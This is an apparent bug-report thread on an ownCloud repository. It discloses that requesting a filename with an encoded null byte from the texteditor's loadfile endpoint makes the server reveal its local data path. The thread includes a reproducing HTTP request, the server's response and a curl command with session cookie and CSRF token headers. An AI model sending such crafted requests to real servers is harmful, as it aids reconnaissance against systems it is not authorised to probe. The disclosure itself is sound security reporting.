Requesting file with zero byte (%00) reveals local path

[fd0]

Hi,

we've discovered that the function loadfile from the texteditor (stock ownCloud 9.1.6.2) can be used to make owncloud reveal the local path to the files stored for the user by requesting a file with a null byte (encoded as %00):

GET /apps/files_texteditor/ajax/loadfile?filename=invalid.txt%00&dir=%2F HTTP/1.1
Host: owncloud.invalid:5443
[...]

The server's response then includes the local path:

HTTP/1.1 400 Bad request
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Aug 2017 12:07:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 171
[...]

{"message":"Following symlinks is not allowed ('\/var\/www\/owncloud\/data\/user1\/files\/invalid.txt\u0000' -\u003E '' not inside '\/var\/www\/owncloud\/data\/user1\/')"}

I apologize if this is the wrong repository to report this issue to, but I did not find any better. Please let me know if you need any additional information.

Thanks!

[settermjd]

I'm not able to repeat this. When I try, I get the following response back {"message":"CSRF check failed"}.

[fd0]

Thanks for the feedback. You need to pass the CSRF token in the HTTP header requesttoken, like this:

$ curl -H 'Cookie: oc_sessionPassphrase=%2B8YOTmcpcZ8ATY%2BmTfYiVlnbNZlG50wTyxu3MpPB68RRJQxAK4XazjPbgz48ImMHf%2BBEFI2yjR45I3bkw4x6OqB7t7BusaagCd8DuEMRYZW2HDNIs4XMGUBjWNIklV%2Fm; 507ab8fb588da=6f8ab2pc36a5uv3k90l25bg0l7' \
  -H 'OCS-APIREQUEST: true' \
  -H 'requesttoken: BRItFlEGDlNmNUAhC3k5HAJkIXEgFyo7cUhbYTA0DTI=:SDgwaA8aWB5UoIHw1+L8LoRSH98NCBDpiMJ6AIxzfIg=' \
  'https://example.com/index.php/apps/files_texteditor/ajax/loadfile?filename=foo.txt%00&dir=%2FNotizen'

{"message":"Following symlinks is not allowed ('\/var\/www\/owncloud\/data\/fd0\/files\/Notizen\/foo.txt\u0000' -\u003E '' not inside '\/var\/www\/owncloud\/data\/fd0\/')"}

(Real example, I've just replaced the domain name).

[fd0]

That's with 10.0.4 by the way.

[settermjd]

@tomneedham, are you still chasing this?